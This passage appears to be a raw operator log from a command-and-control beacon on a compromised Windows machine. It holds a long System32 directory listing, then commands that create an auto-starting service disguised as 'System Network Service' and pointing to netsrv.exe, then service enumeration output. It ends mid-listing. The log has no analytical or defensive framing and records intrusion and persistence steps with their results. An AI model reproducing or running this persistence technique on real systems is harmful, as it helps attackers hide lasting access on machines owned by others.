00:53:37 Windows.System.Profile.SystemManufacturers.dll +F 23040 09/15/2018 07:28:30 Windows.System.RemoteDesktop.dll +F 329216 03/07/2020 00:53:37 Windows.System.SystemManagement.dll +F 91648 09/15/2018 07:28:30 Windows.System.UserDeviceAssociation.dll +F 62976 09/15/2018 07:28:30 Windows.System.UserProfile.DiagnosticsSettings.dll +F 65536 09/15/2018 07:28:30 Windows.UI.Accessibility.dll +F 281088 03/07/2020 00:53:36 Windows.UI.AppDefaults.dll +F 425984 09/15/2018 07:29:46 Windows.UI.BioFeedback.dll +F 470528 09/15/2018 07:28:42 Windows.UI.BlockedShutdown.dll +F 820736 03/07/2020 00:53:40 Windows.UI.Core.TextInput.dll +F 1568768 03/07/2020 00:53:51 Windows.UI.Cred.dll +F 302592 03/07/2020 00:53:57 Windows.UI.CredDialogController.dll +F 1287584 03/07/2020 00:53:36 Windows.UI.dll +F 1711104 03/07/2020 00:53:57 Windows.UI.Immersive.dll +F 4645888 09/15/2018 07:28:32 Windows.UI.Input.Inking.Analysis.dll 
+F 1768960 03/07/2020 00:53:35 Windows.UI.Input.Inking.dll +F 200192 09/15/2018 07:28:20 Windows.UI.Internal.Input.ExpressiveInput.dll +F 84480 09/15/2018 07:28:20 Windows.UI.Internal.Input.ExpressiveInput.Resource.dll +F 2981888 03/07/2020 00:53:51 Windows.UI.Logon.dll +F 79360 09/15/2018 07:28:42 Windows.UI.NetworkUXController.dll +F 2738688 09/15/2018 07:29:46 Windows.UI.PicturePassword.dll +F 902656 03/07/2020 00:53:45 Windows.UI.Search.dll +F 41984 09/15/2018 07:29:46 Windows.UI.Shell.dll +F 128512 03/07/2020 00:53:36 Windows.UI.Storage.dll +F 4853760 03/07/2020 00:53:34 Windows.UI.Xaml.Controls.dll +F 17484800 03/07/2020 00:53:35 Windows.UI.Xaml.dll +F 1030656 09/15/2018 07:28:29 Windows.UI.Xaml.InkControls.dll +F 1336832 09/15/2018 07:28:26 Windows.UI.Xaml.Maps.dll +F 1194496 03/07/2020 00:53:34 Windows.UI.Xaml.Phone.dll +F 43520 09/15/2018 07:28:26 Windows.UI.Xaml.Resources.Common.dll +F 446464 09/15/2018 07:28:36 Windows.UI.Xaml.Resources.rs1.dll +F 497664 09/15/2018 07:28:36 Windows.UI.Xaml.Resources.rs2.dll +F 606720 09/15/2018 07:28:36 Windows.UI.Xaml.Resources.rs3.dll +F 634368 09/15/2018 07:28:36 Windows.UI.Xaml.Resources.rs4.dll +F 690688 09/15/2018 07:28:36 Windows.UI.Xaml.Resources.rs5.dll +F 289792 09/15/2018 07:28:36 Windows.UI.Xaml.Resources.th.dll +F 241664 09/15/2018 07:28:36 Windows.UI.Xaml.Resources.win81.dll +F 142336 09/15/2018 07:28:34 Windows.UI.Xaml.Resources.win8rtm.dll +F 162816 03/07/2020 00:53:51 Windows.UI.XamlHost.dll +F 32768 09/15/2018 07:28:32 Windows.WARP.JITService.dll +F 32768 09/15/2018 07:28:32 Windows.WARP.JITService.exe +F 231424 09/15/2018 07:28:34 Windows.Web.Diagnostics.dll +F 735232 03/07/2020 00:53:34 Windows.Web.dll +F 1335296 03/07/2020 00:53:34 Windows.Web.Http.dll +F 60928 09/15/2018 07:29:19 WindowsActionDialog.exe +F 1796400 03/07/2020 00:53:39 WindowsCodecs.dll +F 284160 09/15/2018 07:28:32 WindowsCodecsExt.dll +F 32924984 09/15/2018 09:09:57 WindowsCodecsRaw.dll +F 1649 09/15/2018 07:29:35 
WindowsCodecsRaw.txt +F 125440 03/07/2020 00:53:40 WindowsDefaultHeatProcessor.dll +F 78648 09/15/2018 09:09:58 windowsdefenderapplicationguardcsp.dll +F 694784 03/07/2020 00:53:53 WindowsInternal.ComposableShell.ComposerFramework.dll +F 192000 03/07/2020 00:53:50 WindowsInternal.ComposableShell.DesktopHosting.dll +F 226816 09/15/2018 07:28:52 windowslivelogin.dll +F 1133056 09/15/2018 07:28:46 windowsperformancerecordercontrol.dll +D 0 09/15/2018 07:33:50 WindowsPowerShell +F 759 09/15/2018 07:28:26 WindowsSecurityIcon.png +F 47104 03/07/2020 00:53:29 WindowsUpdateElevatedInstaller.exe +F 90624 09/15/2018 07:29:23 winethc.dll +D 0 03/30/2020 08:46:55 winevt +F 29696 09/15/2018 07:29:56 WinFax.dll +F 988240 03/07/2020 00:53:26 winhttp.dll +F 99328 09/15/2018 07:29:13 winhttpcom.dll +F 118272 03/07/2020 00:53:22 WinHvEmulation.dll +F 110080 03/07/2020 00:53:22 WinHvPlatform.dll +F 5086208 03/07/2020 00:53:57 wininet.dll +F 69120 09/15/2018 07:29:16 wininetlui.dll +F 388376 09/15/2018 07:28:45 wininit.exe +F 44040 09/15/2018 07:28:47 wininitext.dll +F 501248 03/07/2020 00:53:42 winipcfile.dll +F 898048 03/07/2020 00:53:42 winipcsecproc.dll +F 99840 09/15/2018 07:28:50 winipsec.dll +F 148480 09/15/2018 07:28:25 winjson.dll +F 420864 09/15/2018 07:28:36 Winlangdb.dll +F 1702600 03/07/2020 00:53:50 winload.efi +F 1473080 03/07/2020 00:53:50 winload.exe +F 782848 03/07/2020 00:53:55 winlogon.exe +F 78336 09/15/2018 07:28:45 winlogonext.dll +F 1771824 03/07/2020 00:53:28 winmde.dll +D 0 09/15/2018 07:34:02 WinMetadata +F 43008 09/15/2018 07:28:30 winml.dll +F 129160 09/15/2018 07:28:22 winmm.dll +F 170960 09/15/2018 07:28:22 winmmbase.dll +F 2292224 03/07/2020 00:53:42 winmsipc.dll +F 87040 09/15/2018 07:28:38 WinMsoIrmProtector.dll +F 19968 09/15/2018 07:28:45 winnlsres.dll +F 35112 09/15/2018 07:28:45 winnsi.dll +F 80384 09/15/2018 07:28:38 WinOpcIrmProtector.dll +F 159112 03/07/2020 00:53:26 winquic.dll +F 1346192 03/07/2020 00:53:50 winresume.efi +F 1183504 03/07/2020 
00:53:50 winresume.exe +D 0 09/15/2018 09:07:53 winrm +F 33 09/15/2018 07:28:26 winrm.cmd +F 204105 09/15/2018 07:28:26 winrm.vbs +F 31232 09/15/2018 07:28:51 winrnr.dll +F 50176 09/15/2018 07:28:29 winrs.exe +F 109056 09/15/2018 07:28:29 winrscmd.dll +F 28672 09/15/2018 07:28:29 winrshost.exe +F 2048 09/15/2018 07:28:29 winrsmgr.dll +F 14336 09/15/2018 07:28:29 winrssrv.dll +F 189952 09/15/2018 07:28:29 WinRtTracing.dll +F 2800128 09/15/2018 07:29:24 WinSAT.exe +F 375296 09/15/2018 07:29:24 WinSATAPI.dll +F 246272 09/15/2018 07:28:59 WinSCard.dll +F 379408 09/15/2018 07:28:57 WinSetupUI.dll +F 18944 09/15/2018 07:28:26 winshfhc.dll +F 329216 03/07/2020 00:53:24 winsku.dll +F 95232 09/15/2018 07:28:29 winsockhc.dll +F 542208 03/07/2020 00:53:34 winspool.drv +F 792992 09/15/2018 07:28:46 winsqlite3.dll +F 26112 09/15/2018 07:28:55 WINSRPC.DLL +F 66048 09/15/2018 07:28:47 winsrv.dll +F 91648 09/15/2018 07:28:46 winsrvext.dll +F 341392 03/07/2020 00:53:53 winsta.dll +F 815616 09/15/2018 07:28:34 WinSync.dll +F 236544 09/15/2018 07:29:14 WinSyncMetastore.dll +F 136192 09/15/2018 07:29:14 WinSyncProviders.dll +F 355360 03/07/2020 00:53:25 wintrust.dll +F 1387512 03/07/2020 00:53:26 WinTypes.dll +F 28160 09/15/2018 07:28:29 winusb.dll +F 58880 09/15/2018 07:28:45 winver.exe +F 43008 03/07/2020 00:53:34 WiredNetworkCSP.dll +F 286208 03/07/2020 00:53:53 wisp.dll +F 35840 09/15/2018 07:28:58 witnesswmiv2provider.dll +F 80600 09/15/2018 07:28:45 wkscli.dll +F 273944 09/15/2018 07:29:23 wkspbroker.exe +F 126976 09/15/2018 07:29:23 wkspbrokerAx.dll +F 438784 09/15/2018 07:28:44 wksprt.exe +F 31744 09/15/2018 07:28:45 wksprtPS.dll +F 290816 03/07/2020 00:53:28 wkssvc.dll +F 423480 03/07/2020 00:53:33 wlanapi.dll +F 308736 09/15/2018 07:28:25 wlancfg.dll +F 592896 09/15/2018 07:28:56 WLanConn.dll +F 201216 09/15/2018 07:28:25 wlandlg.dll +F 103424 09/15/2018 07:28:25 wlanext.exe +F 497664 09/15/2018 07:28:25 wlangpui.dll +F 225280 09/15/2018 07:28:24 WLanHC.dll +F 16384 
09/15/2018 07:28:25 wlanhlp.dll +F 684544 09/15/2018 07:28:36 WlanMediaManager.dll +F 4271616 09/15/2018 07:29:19 WlanMM.dll +F 425472 03/07/2020 00:53:33 wlanmsm.dll +F 779264 09/15/2018 07:28:25 wlanpref.dll +F 67072 09/15/2018 07:28:25 WlanRadioManager.dll +F 472064 09/15/2018 07:28:25 wlansec.dll +F 2634752 03/07/2020 00:53:33 wlansvc.dll +F 36864 09/15/2018 07:28:25 wlansvcpal.dll +F 420864 09/15/2018 07:28:25 wlanui.dll +F 3584 09/15/2018 07:28:25 wlanutil.dll +F 367104 03/07/2020 00:53:26 Wldap32.dll +F 141728 03/07/2020 00:53:26 wldp.dll +F 120832 09/15/2018 07:28:25 wlgpclnt.dll +F 696320 09/15/2018 07:28:52 wlidcli.dll +F 283648 03/07/2020 00:53:43 wlidcredprov.dll +F 99328 09/15/2018 07:28:52 wlidfdp.dll +F 66048 09/15/2018 07:28:52 wlidnsp.dll +F 649216 03/07/2020 00:53:36 wlidprov.dll +F 29696 09/15/2018 07:28:30 wlidres.dll +F 2185216 03/07/2020 00:53:36 wlidsvc.dll +F 66336 09/15/2018 07:28:45 wlrmdr.exe +F 743216 03/07/2020 00:54:27 WMADMOD.DLL +F 747568 03/07/2020 00:54:27 WMADMOE.DLL +F 341392 09/15/2018 09:09:54 WMASF.DLL +F 14336 09/15/2018 09:10:01 wmcodecdspps.dll +F 39424 09/15/2018 09:10:04 wmdmlog.dll +F 95744 09/15/2018 09:10:04 wmdmps.dll +F 7680 09/15/2018 07:29:22 wmdrmsdk.dll +F 2560 09/15/2018 09:08:37 wmerror.dll +F 5632 09/15/2018 07:28:45 wmi.dll +F 46592 09/15/2018 07:28:22 wmiclnt.dll +F 419368 03/07/2020 00:53:34 wmicmiplugin.dll +F 166912 09/15/2018 07:28:29 wmidcom.dll +F 199680 09/15/2018 09:09:58 wmidx.dll +F 144673 09/15/2018 07:28:29 WmiMgmt.msc +F 29696 09/15/2018 07:29:24 wmiprop.dll +F 208896 09/15/2018 07:28:26 wmitomi.dll +F 1349632 09/15/2018 09:09:59 WMNetMgr.dll +F 11723776 03/07/2020 00:54:30 wmp.dll +F 1533952 09/15/2018 09:10:04 WMPDMC.exe +F 365568 09/15/2018 09:10:05 WmpDui.dll +F 218624 03/07/2020 00:54:30 wmpdxm.dll +F 301096 03/07/2020 00:54:30 wmpeffects.dll +F 394752 09/15/2018 07:28:29 WMPhoto.dll +F 9068544 09/15/2018 09:08:37 wmploc.DLL +F 388032 09/15/2018 09:08:37 wmpps.dll +F 125440 03/07/2020 
00:54:30 wmpshell.dll +F 19456 09/15/2018 07:28:45 wmsgapi.dll +F 994816 09/15/2018 07:28:59 WMSPDMOD.DLL +F 1254400 03/07/2020 00:54:24 WMSPDMOE.DLL +F 2429768 03/07/2020 00:54:24 WMVCORE.DLL +F 2600808 09/15/2018 09:09:58 WMVDECOD.DLL +F 210432 09/15/2018 09:10:01 wmvdspa.dll +F 2255728 09/15/2018 09:09:57 WMVENCOD.DLL +F 344504 09/15/2018 09:10:05 WMVSDECD.DLL +F 448512 09/15/2018 09:10:02 WMVSENCD.DLL +F 684544 09/15/2018 09:09:57 WMVXENCD.DLL +F 29696 09/15/2018 09:10:01 WofTasks.dll +F 34304 09/15/2018 07:28:42 WofUtil.dll +F 41472 09/15/2018 07:28:32 WordBreakers.dll +F 105472 09/15/2018 07:29:24 WorkFolders.exe +F 835072 09/15/2018 07:29:24 WorkfoldersControl.dll +F 107008 09/15/2018 07:29:24 WorkFoldersGPExt.dll +F 61952 09/15/2018 07:29:24 WorkFoldersRes.dll +F 225280 09/15/2018 07:29:24 WorkFoldersShell.dll +F 2182456 03/07/2020 00:54:22 workfolderssvc.dll +F 227328 03/07/2020 00:53:28 wosc.dll +F 331104 03/07/2020 00:53:36 wow64.dll +F 20728 09/15/2018 07:28:26 wow64cpu.dll +F 505632 03/07/2020 00:53:36 wow64win.dll +F 17408 09/15/2018 07:28:55 wowreg32.exe +F 461824 03/07/2020 00:53:21 WpAXHolder.dll +F 102400 09/15/2018 07:28:50 wpbcreds.dll +F 1633280 09/15/2018 07:28:23 Wpc.dll +F 228864 09/15/2018 07:28:24 WpcApi.dll +F 1422336 03/07/2020 00:53:32 WpcDesktopMonSvc.dll +F 1098056 03/07/2020 00:53:32 WpcMon.exe +F 4687 09/15/2018 07:28:24 wpcmon.png +F 771072 03/07/2020 00:53:32 WpcRefreshTask.dll +F 270848 03/07/2020 00:53:32 WpcTok.exe +F 890368 03/07/2020 00:53:32 WpcWebFilter.dll +F 83968 09/15/2018 09:10:00 wpdbusenum.dll +F 1942016 09/15/2018 09:09:55 wpdshext.dll +F 30208 09/15/2018 09:09:55 WPDShextAutoplay.exe +F 66560 09/15/2018 09:09:55 WPDShServiceObj.dll +F 376832 09/15/2018 09:10:03 WPDSp.dll +F 223232 09/15/2018 09:10:02 wpd_ci.dll +F 1315328 03/07/2020 00:53:41 wpnapps.dll +F 359424 03/07/2020 00:53:41 wpnclient.dll +F 1644544 03/07/2020 00:53:41 wpncore.dll +F 24064 09/15/2018 07:28:34 wpninprc.dll +F 22016 09/15/2018 07:29:24 
wpnpinst.exe +F 575488 03/07/2020 00:53:41 wpnprv.dll +F 256000 03/07/2020 00:53:41 wpnservice.dll +F 36864 03/07/2020 00:53:41 wpnsruprov.dll +F 97280 03/07/2020 00:53:41 WpnUserService.dll +F 14848 09/15/2018 07:28:30 WpPortingLibrary.dll +F 11264 09/15/2018 07:28:53 WppRecorderUM.dll +F 724 09/15/2018 07:28:46 wpr.config.xml +F 329216 03/07/2020 00:53:29 wpr.exe +F 173568 03/07/2020 00:53:53 WPTaskScheduler.dll +F 1321784 03/07/2020 00:53:32 wpx.dll +F 11264 09/15/2018 07:29:24 write.exe +F 4608 09/15/2018 07:28:29 ws2help.dll +F 434952 03/07/2020 00:53:54 ws2_32.dll +F 9216 09/15/2018 07:28:24 wscadminui.exe +F 293856 03/07/2020 00:53:33 wscapi.dll +F 218624 03/07/2020 00:54:18 wscinterop.dll +F 27136 09/15/2018 07:28:24 wscisvif.dll +F 13312 09/15/2018 07:28:29 WSClient.dll +F 94208 09/15/2018 07:28:44 WSCollect.exe +F 18944 09/15/2018 07:28:24 wscproxystub.dll +F 165888 09/15/2018 07:28:57 wscript.exe +F 312704 03/07/2020 00:53:33 wscsvc.dll +F 1182720 03/07/2020 00:54:18 wscui.cpl +F 697344 09/15/2018 07:28:38 WSDApi.dll +F 54272 09/15/2018 07:29:21 wsdchngr.dll +F 91648 09/15/2018 07:29:21 WSDPrintProxy.DLL +F 69632 09/15/2018 07:29:16 WSDScanProxy.dll +F 1465344 03/07/2020 00:54:11 wsecedit.dll +F 50688 09/15/2018 07:28:57 wsepno.dll +F 64000 09/15/2018 07:28:36 wshbth.dll +F 24064 09/15/2018 07:28:57 wshcon.dll +F 22016 09/15/2018 07:28:29 wshelper.dll +F 99328 09/15/2018 07:28:57 wshext.dll +F 18584 09/15/2018 07:29:24 wshhyperv.dll +F 12800 09/15/2018 07:28:46 wship6.dll +F 15360 09/15/2018 07:29:24 wshirda.dll +F 142336 09/15/2018 07:28:57 wshom.ocx +F 19968 09/15/2018 07:28:36 wshqos.dll +F 18432 09/15/2018 07:29:20 wshrm.dll +F 12800 09/15/2018 07:28:46 WSHTCPIP.DLL +F 17776 09/15/2018 07:28:56 wshunix.dll +F 36352 09/15/2018 07:29:25 wslapi.dll +F 32256 09/15/2018 07:28:26 WsmAgent.dll +F 4675 09/15/2018 07:28:26 wsmanconfig_schema.xml +F 32768 03/07/2020 00:53:36 WSManHTTPConfig.exe +F 75264 03/07/2020 00:53:36 WSManMigrationPlugin.dll +F 164352 
09/15/2018 07:28:26 WsmAuto.dll +F 15872 09/15/2018 07:28:26 wsmplpxy.dll +F 37888 09/15/2018 07:28:26 wsmprovhost.exe +F 1559 09/15/2018 07:28:26 WsmPty.xsl +F 61952 09/15/2018 07:28:26 WsmRes.dll +F 2620928 03/07/2020 00:53:36 WsmSvc.dll +F 2426 09/15/2018 07:28:26 WsmTxt.xsl +F 275456 09/15/2018 07:28:26 WsmWmiPl.dll +F 66560 09/15/2018 07:28:57 wsnmp32.dll +F 18944 09/15/2018 07:28:29 wsock32.dll +F 43520 09/15/2018 07:28:25 wsplib.dll +F 2127360 03/07/2020 00:54:16 wsp_fs.dll +F 1782272 03/07/2020 00:54:16 wsp_health.dll +F 945664 09/15/2018 07:29:22 wsp_sr.dll +F 92160 03/07/2020 00:53:53 wsqmcons.exe +F 93184 03/07/2020 00:53:53 WSReset.exe +F 92672 09/15/2018 07:29:23 WSTPager.ax +F 64792 09/15/2018 07:28:44 wtsapi32.dll +F 1004544 03/07/2020 00:53:29 wuapi.dll +F 11264 09/15/2018 07:28:36 wuapihost.exe +F 47512 09/15/2018 07:28:34 wuauclt.exe +F 3006464 03/07/2020 00:53:29 wuaueng.dll +F 223744 09/15/2018 07:28:44 wuceffects.dll +F 49664 09/15/2018 07:28:44 WUDFCoinstaller.dll +F 156736 09/15/2018 07:28:52 WUDFCompanionHost.exe +F 256512 09/15/2018 07:28:52 WUDFHost.exe +F 188664 09/15/2018 07:28:52 WUDFPlatform.dll +F 55296 09/15/2018 07:28:59 WudfSMCClassExt.dll +F 583680 09/15/2018 07:28:44 WUDFx.dll +F 633416 09/15/2018 07:28:52 WUDFx02000.dll +F 83968 09/15/2018 07:28:44 wudriver.dll +F 69120 03/07/2020 00:53:29 wups.dll +F 35840 03/07/2020 00:53:29 wups2.dll +F 310272 09/15/2018 07:28:29 wusa.exe +F 476160 03/07/2020 00:53:29 wuuhext.dll +F 182272 03/07/2020 00:53:29 wuuhosdeployment.dll +F 574976 09/15/2018 07:29:21 wvc.dll +F 556544 09/15/2018 07:28:29 WwaApi.dll +F 39936 09/15/2018 07:28:29 WwaExt.dll +F 984888 03/07/2020 00:53:35 WWAHost.exe +F 556768 09/15/2018 07:28:25 WWanAPI.dll +F 82944 09/15/2018 07:29:25 wwancfg.dll +F 467456 03/07/2020 00:54:18 wwanconn.dll +F 75776 09/15/2018 07:29:25 WWanHC.dll +F 6578176 09/15/2018 07:29:25 wwanmm.dll +F 50688 09/15/2018 07:29:25 Wwanpref.dll +F 97280 09/15/2018 07:29:25 wwanprotdim.dll +F 86016 
09/15/2018 07:29:25 WwanRadioManager.dll +F 1750528 03/07/2020 00:54:18 wwansvc.dll +F 95008 09/15/2018 07:28:25 wwapi.dll +F 176128 09/15/2018 07:28:29 XamlTileRender.dll +F 3584 09/15/2018 07:28:22 XAudio2_8.dll +F 589312 09/15/2018 07:28:22 XAudio2_9.dll +F 1049600 03/07/2020 00:53:31 XblAuthManager.dll +F 86528 09/15/2018 07:28:20 XblAuthManagerProxy.dll +F 88064 09/15/2018 07:28:20 XblAuthTokenBrokerExt.dll +F 1265152 09/15/2018 07:28:20 XblGameSave.dll +F 151552 09/15/2018 07:28:22 XblGameSaveExt.dll +F 39936 09/15/2018 07:28:22 XblGameSaveProxy.dll +F 32768 09/15/2018 07:28:20 XblGameSaveTask.exe +F 65024 09/15/2018 07:28:22 XboxGipRadioManager.dll +F 72704 09/15/2018 07:28:20 xboxgipsvc.dll +F 97280 09/15/2018 07:28:30 xboxgipsynthetic.dll +F 1228800 09/15/2018 07:29:13 XboxNetApiSvc.dll +F 47616 09/15/2018 07:29:14 xcopy.exe +F 44032 09/15/2018 07:29:14 XInput1_4.dll +F 10752 09/15/2018 07:29:14 XInput9_1_0.dll +F 48640 09/15/2018 07:28:30 XInputUap.dll +F 68096 09/15/2018 07:28:57 xmlfilter.dll +F 230848 03/07/2020 00:53:26 xmllite.dll +F 22016 09/15/2018 07:28:50 xmlprovi.dll +F 64000 09/15/2018 07:29:14 xolehlp.dll +F 355328 03/07/2020 00:53:44 XpsDocumentTargetPrint.dll +F 471040 09/15/2018 07:28:55 XpsGdiConverter.dll +F 1688064 03/07/2020 00:53:44 XpsPrint.dll +F 582656 09/15/2018 07:28:56 XpsRasterService.dll +F 2879488 03/07/2020 00:53:44 xpsservices.dll +F 4014 09/15/2018 07:29:24 xwizard.dtd +F 62464 09/15/2018 07:29:24 xwizard.exe +F 448000 09/15/2018 07:29:24 xwizards.dll +F 118272 09/15/2018 07:29:24 xwreg.dll +F 257536 09/15/2018 07:29:24 xwtpdui.dll +F 143360 09/15/2018 07:29:24 xwtpw32.dll +D 0 03/07/2020 00:55:55 zh-CN +D 0 09/15/2018 09:09:27 zh-TW +F 79872 09/15/2018 07:28:34 zipcontainer.dll +F 429568 03/07/2020 00:53:53 zipfldr.dll +F 30720 09/15/2018 07:28:36 ztrace_maps.dll + + +03/30 08:53:27 UTC [input] run sc create netsrv binPath= "C:\windows\system32\netsrv.exe" start= auto DisplayName= "System Network Service" +03/30 08:53:27 
UTC [task] Tasked beacon to run: sc create netsrv binPath= "C:\windows\system32\netsrv.exe" start= auto DisplayName= "System Network Service" +03/30 08:53:28 UTC [checkin] host called home, sent: 126 bytes +03/30 08:53:28 UTC [output] +received output: +[SC] CreateService SUCCESS + + +03/30 08:54:22 UTC [input] run sc query "System network service" +03/30 08:54:22 UTC [task] Tasked beacon to run: sc query "System network service" +03/30 08:54:26 UTC [checkin] host called home, sent: 51 bytes +03/30 08:54:26 UTC [output] +received output: +[SC] EnumQueryServicesStatus:OpenService FAILED 1060: + +The specified service does not exist as an installed service. + + + +03/30 08:54:39 UTC [input] run sc query +03/30 08:54:39 UTC [task] Tasked beacon to run: sc query +03/30 08:54:40 UTC [checkin] host called home, sent: 26 bytes +03/30 08:54:40 UTC [output] +received output: + +SERVICE_NAME: Appinfo +DISPLAY_NAME: Application Information + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: AppXSvc +DISPLAY_NAME: AppX Deployment Service (AppXSVC) + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: AudioEndpointBuilder +DISPLAY_NAME: Windows Audio Endpoint Builder + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Audiosrv +DISPLAY_NAME: Windows Audio + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: BFE +DISPLAY_NAME: Base Filtering Engine + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + 
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: BrokerInfrastructure +DISPLAY_NAME: Background Tasks Infrastructure Service + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: CDPSvc +DISPLAY_NAME: Connected Devices Platform Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: CertPropSvc +DISPLAY_NAME: Certificate Propagation + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: ClickToRunSvc +DISPLAY_NAME: Microsoft Office Click-to-Run Service + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: CoreMessagingRegistrar +DISPLAY_NAME: CoreMessaging + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: CryptSvc +DISPLAY_NAME: Cryptographic Services + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: DcomLaunch +DISPLAY_NAME: DCOM Server Process Launcher + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: 
Dhcp +DISPLAY_NAME: DHCP Client + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: DiagTrack +DISPLAY_NAME: Connected User Experiences and Telemetry + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Dnscache +DISPLAY_NAME: DNS Client + TYPE : 30 WIN32 + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: DoSvc +DISPLAY_NAME: Delivery Optimization + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: DPS +DISPLAY_NAME: Diagnostic Policy Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: DusmSvc +DISPLAY_NAME: Data Usage + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: EventLog +DISPLAY_NAME: Windows Event Log + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: EventSystem +DISPLAY_NAME: COM+ Event System + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: FontCache +DISPLAY_NAME: Windows Font Cache Service + 
